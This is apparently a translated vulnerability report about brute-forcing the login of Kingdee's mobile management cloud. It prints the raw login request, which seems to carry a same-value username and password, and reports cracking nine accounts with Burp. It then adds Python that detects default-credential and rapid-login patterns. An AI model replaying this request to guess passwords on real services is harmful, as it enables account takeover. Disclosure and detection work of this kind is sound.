### Brief description:
As the title says: Kingdee Enterprise Mobile Management Cloud (金蝶企业移动管理云) is exposed to brute force and weak passwords; the login has no CAPTCHA and accounts use default passwords.
### Details:
Affected URL: http://mcloud.kingdee.com/mcloud/pages/
[<img src="https://images.seebug.org/upload/201505/04171113e7cb8b1352bfddfe59f57537412a006f.jpg" alt="2.JPG" width="600">](https://images.seebug.org/upload/201505/04171113e7cb8b1352bfddfe59f57537412a006f.jpg)
```
POST /mcloud/dwr/call/plaincall/custLoginService.login.dwr HTTP/1.1
Host: mcloud.kingdee.com
Proxy-Connection: keep-alive
Content-Length: 301
Origin: http://mcloud.kingdee.com
User-Agent:
Content-Type: text/plain
Accept: */*
Referer: http://mcloud.kingdee.com/mcloud/pages/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8
Cookie: JSESSIONID=w5u6heawhjdu1dt5et16a26sk
callCount=1
page=/mcloud/pages/
httpSessionId=w5u6heawhjdu1dt5et16a26sk
scriptSessionId=7EE1BE8590F1DDD3DC769322161A837A576
c0-scriptName=custLoginService
c0-methodName=login
c0-id=0
c0-e1=string:340727
c0-e2=string:340727
c0-param0=Object_Object:{user:reference:c0-e1, pwd:reference:c0-e2}
batchId=0
```
Testing with Burp against only 300 accounts already cracked 9 weak-password accounts, as shown below.
[<img src="https://images.seebug.org/upload/201505/0417090176c5bd06bcdc9ccfceeb69631388ae00.jpg" alt="1.JPG" width="600">](https://images.seebug.org/upload/201505/0417090176c5bd06bcdc9ccfceeb69631388ae00.jpg)
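The DWR body above carries the credentials as `c0-e1`/`c0-e2` string references resolved through `c0-param0`. As an added defensive example (not part of this report), the following Python resolves those references from recorded login events and flags sessions that submit the default `user == pwd` pattern or exceed a login-attempt rate; the event tuple layout, the thresholds and the sample events are assumptions constructed here.

```python
import re
from collections import defaultdict

DWR_LOGIN_PATH = "/mcloud/dwr/call/plaincall/custLoginService.login.dwr"

def parse_dwr_login(body):
    """Resolve user/pwd from a DWR plaincall body shaped like the captured request.
    Returns (user, pwd), or None if this is not a custLoginService.login call."""
    fields = dict(ln.split("=", 1) for ln in body.strip().splitlines() if "=" in ln)
    if (fields.get("c0-scriptName"), fields.get("c0-methodName")) != ("custLoginService", "login"):
        return None
    m = re.search(r"user:reference:(c0-e\d+),\s*pwd:reference:(c0-e\d+)", fields.get("c0-param0", ""))
    if not m:
        return None
    def resolve(ref):  # "string:340727" -> "340727"
        val = fields.get(ref, "")
        return val.split(":", 1)[1] if val.startswith("string:") else None
    return resolve(m.group(1)), resolve(m.group(2))

def audit_login_events(events, max_attempts=10, window_s=60):
    """events: iterable of (ts_seconds, session_id, path, body) (assumed layout).
    Returns (sessions submitting user == pwd, sessions exceeding max_attempts
    login calls inside any sliding window of window_s seconds)."""
    attempts, default_cred = defaultdict(list), set()
    for ts, sid, path, body in events:
        if path != DWR_LOGIN_PATH:
            continue
        creds = parse_dwr_login(body)
        if creds is None:
            continue
        user, pwd = creds
        attempts[sid].append(ts)
        if user is not None and user == pwd:  # default-password pattern from the report
            default_cred.add(sid)
    brute = set()
    for sid, times in attempts.items():
        times.sort()
        start = 0
        for end, t in enumerate(times):
            while times[start] < t - window_s:  # slide the window forward
                start += 1
            if end - start + 1 > max_attempts:
                brute.add(sid)
                break
    return sorted(default_cred), sorted(brute)

def make_body(user, pwd):
    """Constructed DWR body in the same layout as the captured request (sample only)."""
    return ("callCount=1\nc0-scriptName=custLoginService\nc0-methodName=login\nc0-id=0\n"
            f"c0-e1=string:{user}\nc0-e2=string:{pwd}\n"
            "c0-param0=Object_Object:{user:reference:c0-e1, pwd:reference:c0-e2}\nbatchId=0")

# Constructed sample: sess-A fires 12 user == pwd guesses in 22 s, sess-B logs in once normally.
SAMPLE_EVENTS = [(i * 2, "sess-A", DWR_LOGIN_PATH, make_body(str(340700 + i), str(340700 + i)))
                 for i in range(12)]
SAMPLE_EVENTS.append((100, "sess-B", DWR_LOGIN_PATH, make_body("alice", "correct horse")))
```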
### Proof of vulnerability:
[<img src="https://images.seebug.org/upload/201505/041710383236b2fa73c9b8abebe36a3bc68bcf68.jpg" alt="捕获.JPG" width="600">](https://images.seebug.org/upload/201505/041710383236b2fa73c9b8abebe36a3bc68bcf68.jpg)